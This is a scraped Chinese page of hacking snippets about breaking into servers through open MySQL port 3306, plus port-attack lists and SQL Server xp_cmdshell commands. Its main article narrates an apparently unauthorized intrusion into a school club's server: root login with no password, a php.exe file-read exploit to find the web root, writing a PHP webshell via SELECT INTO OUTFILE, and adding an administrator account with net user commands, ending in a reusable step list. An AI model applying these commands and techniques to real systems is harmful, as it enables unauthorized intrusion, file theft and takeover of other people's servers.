精华内容
下载资源
问答
  • 3306端口入侵
    千次阅读
    2021-02-07 15:17:26

    观看地址:

    mysql数据库

    命令:

    mysql -u 账号 -h 对方IP -p    连接mysql

    show databases; 查看数据库类型

    use xxxx   切换数据库

    show tables;  查看表名

    create table  x  x为所要新建的表名

    drop table x   x为所要删除的表名  前提是改表名是存在的

    insert into a values ("set o=createobject( ""shell.users"" )" );

    insert into a values ("set z=o.create(""398"") " );

    insert into a values ("z.changepassword ""398"",""" """  ");

    insert into a values ("z.setting(""AccounTtype"")=3  " );

    select * from a into outfile "c:\\docume~1\\alluse~\路径...

    mysql.exe和nc.exe 带毒,我就不带包了,大家百度下载就行

    更多相关内容
  • mysql用superscan扫了一下某个c类的网段,寻找开放80端口的机器,结果就只有一台机器开放了80端口,试着连了一下,是我们学校某个社团的的主页,从端口的banner来看应该是apache(win32),证实一下telnet 211.87.xxx....

    mysql

    用superscan扫了一下

    某个c类的网段,寻找开放80端口的机器,结果就只有一台机器

    开放了80端口,试着连了一下,是我们学校某个社团的的主页,

    从端口的banner来看应该是apache(win32),证实一下

    telnet 211.87.xxx.xxx

    get(回车)

    501 Method

    Not Implemented

    Method Not Implemented

    get to /index

    .html not supported.

    Invalid method in request get

    Apache/1.3.2

    2 Server atwww.xxxxxx.comPort 80

    遗失对主机的连接。

    C:\>

    呵呵,这下看得更清楚了

    据我猜测,应该是"apache+mysql+php"的黄金组合吧

    习惯性的mysql -h 211.87.xxx.xxx

    果然连上了

    Welcome to the MySQL monitor. Commands end with or \g.

    Your MySQL connection id is 17 to server version: 3.23.53-max-nt

    Type help; or \h for help. Type \c to clear the buffer.

    mysql>

    断开试着

    mysql -h 211.87.xxx.xxx -u root -p

    password:

    Welcome to the MySQL monitor. Commands end with or \g.

    Your MySQL connection id is 18 to server version: 3.23.53-max-nt

    Type help; or \h for help. Type \c to clear the buffer.

    mysql>

    呵呵,大家看到了他的root用户没有密码,这是我今天要说的第一个主题。

    这是相当的危险的,碰见这种情况,有99.999%的可能可以进入

    既然使用的apache+php,只要找到他在本地存放的web的物理路径就为所欲为了

    呵呵

    下一个问题是我今天要说的重点怎么样才能知道那台主机的存放的web的物理路径?

    方法有很多种,在这里我介绍2种方法供初学者参考

    首先要告诉大家的是低版本的apache+php有一个漏洞

    提http://xxx.xxxx.xxx.xxx/php/php.exe?对方的物理文件名

    就可以把那个物理文件下载下来。

    于是提http://211.87.xxx.xxx/php/php.exe?c:\a.txt

    返回

    No input file specified. (没有这个漏洞的话提示找不到网页)

    好的,这说明他有这个漏洞。

    在提http://211.87.xxx.xxx/php/php.exe?c:\boot.ini

    返回

    [boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS [operating

    systems] multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional"

    /fastdetect

    呵呵,装的还是xp。

    好了,我们可以猜测对方apache的conf文件的物理位置了

    http://211.87.xxx.xxx/php/php.exe?c:\apache\conf\httpd.conf

    No input file specified.

    http://211.87.xxx.xxx/php/php.exe?d:\apache\conf\httpd.conf

    No input file specified.

    http://211.87.xxx.xxx/php/php.exe?e:\apache\conf\httpd.conf

    No input file specified.

    http://211.87.xxx.xxx/php/php.exe?c:\ProgramFiles\apache\conf\httpd.conf

    No input file specified.

    http://211.87.xxx.xxx/php/php.exe?f:\apache\conf\httpd.conf

    猜到了,返回了好多东西

    找到我们想要的

    # DocumentRoot: The directory out of which you will serve your

    # documents. By default, all requests are taken from this directory, but

    # symbolic links and aliases may be used to point to other locations.

    #

    DocumentRoot "D:\homepage"

    看得出来对方的主目录是D:\homepage

    下面的事就好办了,现在就想得到shell?

    先别急,我们先来看看另一种方法

    那就是利用mysql的错误

    随便的浏览一下他的网页找到一处利用mysql的地方

    http://211.87.xxx.xxx/skonline/study/list.php?id=14

    长得太帅了,哈哈哈哈

    提交

    http://211.87.xxx.xxx/skonline/study/list.php?id=14

    返回

    Warning: Supplied argument is not a valid MySQL result resource in

    d:\homepage\skonline\study\list.php on line 231

    呵呵,一览无余,看紧你的3306端口,一次通过mysql的入侵数据库教程》(https://www.unjs.com)。

    然后,然后就是制造我们的shell

    mysql -h 211.87.xxx.xxx -u root -p

    password:

    Welcome to the MySQL monitor. Commands end with or \g.

    Your MySQL connection id is 18 to server version: 3.23.53-max-nt

    Type help; or \h for help. Type \c to clear the buffer.

    mysql> use test;

    Database changed

    mysql> create table t(cmd text);

    Query OK, 0 rows affected (0.08 sec)

    mysql> insert into t values();

    Query OK, 1 row affected (12.52 sec)

    mysql> select * from t into d:\\homepage\\test.php;

    我的shell很简单,不到20个字符,但他已经足够了

    可以让我执行任意命令,由此足以看出php的强大。

    怎么用?

    提交

    http://211.87.xxx.xxx/test.php?c=net;user kid /add

    命令成功完成

    http://211.87.xxx.xxx/test.php?c=net;localgroup administrators kid /add

    命令成功完成

    呵呵,测试成功,通过!

    剩下的就是你自由发挥了。

    由此我们不难总结出这一类的入侵步骤:

    1,找到没有密码的3306端口

    2,找到对方的web物理路径

    3,制造shell

    4,后续工作

    呵呵,在这里提醒大家,如果你想要或正在用mysql的时候

    千万要给自己的root设上一个强有力的密

    展开全文
  • 一、1433端口 1433端口是SQL Server默认的端口,SQL Server服务使用两个端口:TCP-1433、UDP-1434。其中1433用于供SQL ...常见的1433端口入侵,即对MSSql服务的入侵,就是SA用户的弱口令扫描。 SA是Microsoft S...

    一、1433端口

    1433端口是SQL Server默认的端口,SQL Server服务使用两个端口:TCP-1433、UDP-1434。其中1433用于供SQL Server对外提供服务,1434用于向请求者返回SQL Server使用了哪个TCP/IP端口。

    二、1433端口入侵

    常见的1433端口入侵,即对MSSql服务的入侵,就是SA用户的弱口令扫描。

    SA是Microsoft SQLServer的管理员帐号,拥有最高权限,它可以执行扩展存储过程,并获得返回值,比如执行:

    exec master..xp_cmdshell 'net user test 12345 /add'和exec master..xp_cmd
    shell 'net localgroup administrators test /add'

    这样对方的系统就被添加了一个用户名为test,密码为12345,有管理员权限的用户。

    三、1433端口防御

    这里我们参考:https://wenku.baidu.com/view/43d7676a25c52cc58bd6beab.html

    1.关掉1433端口;

    2.配置安全策略。

    四、3306端口

    Mysql的默认端口,也是弱密码爆破。

     

    展开全文
  • 最全端口入侵

    千次阅读 2019-08-25 10:27:47
    我整理收集了大量资料汇总了这篇常见端口入侵篇,后续会持续增加 21 ftp 默认用户/后门/溢出 22 SSH 23 Telnet 25 SMTP 无认证伪造发件人 53 DNS 域传送漏洞/SPF/DMARC Check 80 web 80-89 web 137/138/139/...

    我整理收集了大量资料汇总了这篇常见端口入侵篇,后续会持续增加

    21 ftp 默认用户/后门/溢出

    22 SSH

    23 Telnet

    25 SMTP 无认证伪造发件人 

    53 DNS 域传送漏洞/SPF/DMARC Check

    80 web

    80-89 web

    137/138/139/445 未授权访问/弱口令

    161 SNMP   Public弱口令

    389 LDAP 匿名访问/注入

    443 WEB/SSL心脏滴血

    512,513,514 Rexec

    873 Rsync 未授权访问

    1025,111 NFS

    1433 MSSQL

    1099 java RMI    RCE

    1521 Oracle:(iSqlPlus Port:5560,7778)

    2049 NFS  权限配置不当

    2181 ZooKeeper  无身份认证

    2082/2083   cpanel主机管理系统登陆 (国外用较多)

    2222   DA虚拟主机管理系统登陆 (国外用较多)

    2601,2604  zebra路由,默认密码zebra

    3128 squid  代理默认端口,如果没设置口令很可能就直接漫游内网了

    3306 MySQL

    3312/3311 kangle主机管理系统登陆

    3389 远程桌面

    4440 rundeck  参考WooYun: 借用新浪某服务成功漫游新浪内网

    5432 PostgreSQL 弱口令

    5900 vnc

    5984 CouchDB http://xxx:5984/_utils/   未授权访问

    6082 varnish 参考WooYun: Varnish HTTP accelerator CLI 未授权访问易导致网站被直接篡改或者作为代理进入内网

    6379 redis未授权 

    7001,7002 WebLogic默认弱口令,反序列

    7778 Kloxo主机控制面板登录

    8000-9090 都是一些常见的web端口,有些运维喜欢把管理后台开在这些非80的端口上

    8080 tomcat/WDCP主机管理系统,默认弱口令 8080,8089,9090 JBOSS

    8083 Vestacp主机管理系统 (国外用较多)

    8649 ganglia

    8888 amh/LuManager 主机管理系统默认端口

    9200,9300 elasticsearch 参考WooYun: 多玩某服务器ElasticSearch命令执行漏洞

    10000 Virtualmin/Webmin 服务器虚拟主机管理系统

    11211 memcache未授权访问

    27017,27018 Mongodb未授权访问

    28017 mongodb统计页面

    50000 SAP命令执行

    50070,50030 hadoop默认端口未授权访问

    展开全文
  • 常见的端口漏洞入侵主机

    万次阅读 多人点赞 2019-06-05 16:15:29
    当我们渗透一个网站时发现从网站渗透不进去的时候,就可以查看该网站主机开启了哪些端口,来从其开启的端口来进行入侵 一旦端口开放的话就可以从外部访问,操作系统都有或多或少的漏洞,特殊的请求或者指令触发之后...
  • Mysql3306端口被占用,妙招轻松解决早晨发现mysql服务器意外停止服务,造成网站无法打开,查看mysql日志(注:该日志在msyql安装目录下data文件夹里,文件名是机器名.err,该文件可用记事本打开)发现如下问题;...
  • 常见端口入侵

    千次阅读 2020-04-15 07:34:58
    20:FTP服务的数据传输端口 21:FTP服务的连接端口,可能存在 匿名登陆 弱口令暴力破解 匿名登陆:1.用nc链接21号端口 2.直接使用USER anonymous PASS xxxx 22:SSH服务端口,可能存在 弱口令暴力破解 23:Telnet...
  • 3306端口入侵【转】

    千次阅读 2013-07-05 14:35:00
    这一节说一下3306端口,通过Mysql入侵服务器.  坦白的讲,我对mysql知道的太少,只是知它于mssql相对应的1433端口,它是3306。在w2k上它主要和是php组合,我一直学习的是asp+acess,没学习过mysql,也从来没有通过...
  • MySQL 小心3306端口

    万次阅读 2017-08-12 10:46:16
    接受这个项目的已经有一个月,但是在前几天,服务器上的项目突然跑不了,页面也时不时的刷新不出来...所如果你的服务器上安装了MySQL就要留心,你可以改变端口或者设置复杂的用户和密码来减少3306端口被攻破的概率。
  • 常见端口对应服务及入侵方式

    千次阅读 2021-01-28 08:20:20
    端口服务及利用简析 文件共享服务端口 端口端口说明 利用方向 21/22/69 FTP/TFTP 文件传输协议 允许匿名上传、下载、爆破和嗅探 2049 NFS 服务 配置不当 139 Samba 服务 爆破、未授权访问、远程代码执行 389 LDAP...
  • 黑客攻击常用端口

    千次阅读 2019-04-17 17:51:05
    入侵方式 21 ftp/tftp/vsftpd文件传输协议 爆破/嗅探/溢出/后门 22 ssh远程连接 爆破/openssh漏洞 23 Telnet远程连接 爆破/嗅探/弱口令 25 SMTP邮件服务 邮件伪造 53 DNS...
  • 4899端口入侵扫描工具

    2018-08-26 17:19:54
    4899端口入侵扫描工具,发现端口扫描漏洞和安全隐患。
  • 入侵的动机我保留,只记述过程啦!目标主机:10.75.166.12(我的ISP的真实内部地址)。目的:更改其WEB页,还有别的么?呵呵我保留!首先:看看这个网段都有那些机子,还有他们都开什么端口吧!我用scanner(很好的扫描...
  • ​ ip.txt中放入需要爆破的ip+端口,比如 10.10.10.10:3306。 如果不是标准端口,比如3307是MYSQL。写成 10.10.10.10:3306|MYSQL。 其他 FTP/SSH/SMB/MSSQL/MYSQL/POSTGRESQL/MONGOD同理 ​ Windows/MAC/Linux已经...
  • Web应用服务端口渗透HTTP服务:对于http服务其实是我们目前这几...IIS服务默认端口:80/81/443攻击方式:IISPUT写文件:利用IIS漏洞,put方法直接将文件放置到服务器上短文件名泄漏:这种一般没啥影响解析漏洞:详细...
  • 端口号 简介 ftp 20、21 File Transfer Protocol 文件传输协议,20用于连接,21用于传输 ssh 22 Secure Shell 安全外壳协议,专为远程登录会话和其他网络服务提供安全性的协议 telnet 23 远程连接你电脑做...
  • 80与8080端口入侵

    2012-11-10 23:19:02
    80与8080端口入侵实80与8080
  • 445端口入侵详解

    千次阅读 2017-05-16 13:54:25
    445端口入侵详解 445端口入侵,在这之前我们首先要看的还是445端口为什么回成为入侵的端口呢? 445端口就是IPC 服务的默认端口  ipc$ 一 摘要  二 什么是 ipc$  三 什么是空会话  四 空会话可以做...
  • 如何利用445端口进行入侵渗透 445端口入侵原因详细解析。大家在进行入侵渗透个人电脑的时候,经常会碰到各种各样的端口,比如135,1433,445,3306等端口,现在小编就给大家讲解下445端口如何入侵。 445端口入侵...
  • 准备工具:ShowIP.exe (较全的IP数据库) S.exe (端口扫描器,因为它速度快所以我建议大家用这个) Domain3.5 (明小子的旁注工具)
  • 入侵常用端口

    2020-06-08 10:04:00
    入侵常用端口详解 在渗透中端口扫描的收集主机那些那些服务很重要,这里收集到一些常见的的服务端口 第三方通用组件漏洞struts thinkphp jboss ganglia zabbix 80 web 80-89 web 8000-9090 web 2,数据库类(扫描弱口令...
  • 网站开放的端口越少网站就越安全,像我的网站就只开放了三个端口。如果你不是经常访问查看数据库,那么 phpMyadmin 服务也没必要启动的。可以把phpMyadmin服务给停止掉,不会影响到网站的正常使用。
  • 基于机器学习的端口扫描入侵检测
  • docker remote API的同学对2375端口入侵服务器 2375->上传镜像-》获取控制权-》ssh pub key 注入-》登入服务器 核心总结: 1.禁用2375 2.创建linux新用户 3.禁止root远程登录 4.卸载重新安装docker,并...
  • 入侵常用端口详解

    千次阅读 2019-04-12 17:19:04
    在渗透中端口扫描的收集主机那些那些服务很重要,这里收集到一些常见的的服务端口 第三方通用组件漏洞struts thinkphp jboss ganglia zabbix 80 web 80-89 web 8000-9090 web 2,数据库类(扫描弱口令) 1433 MSSQL 1521...
  • 如何入侵139端口

    千次阅读 2021-03-03 15:32:36
    我们先确定一台存在139端口漏洞的主机。用扫描工具扫描!比如SUPERSCAN这个端口扫描工具。假设现在我们已经得到一台存在139端口漏洞的主机,我们要使用nbtstat -a IP这个命令得到用户的情况!现在我们要做的是与对方...
  • 详细 21端口入侵

    2011-02-06 20:21:30
    弱口令 21端口入侵
  • 常见端口入侵与防范

    2013-01-20 14:56:10
    常见端口入侵与防范动画 这是一个动画教程 通俗易懂

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 43,457
精华内容 17,382
关键字:

3306端口入侵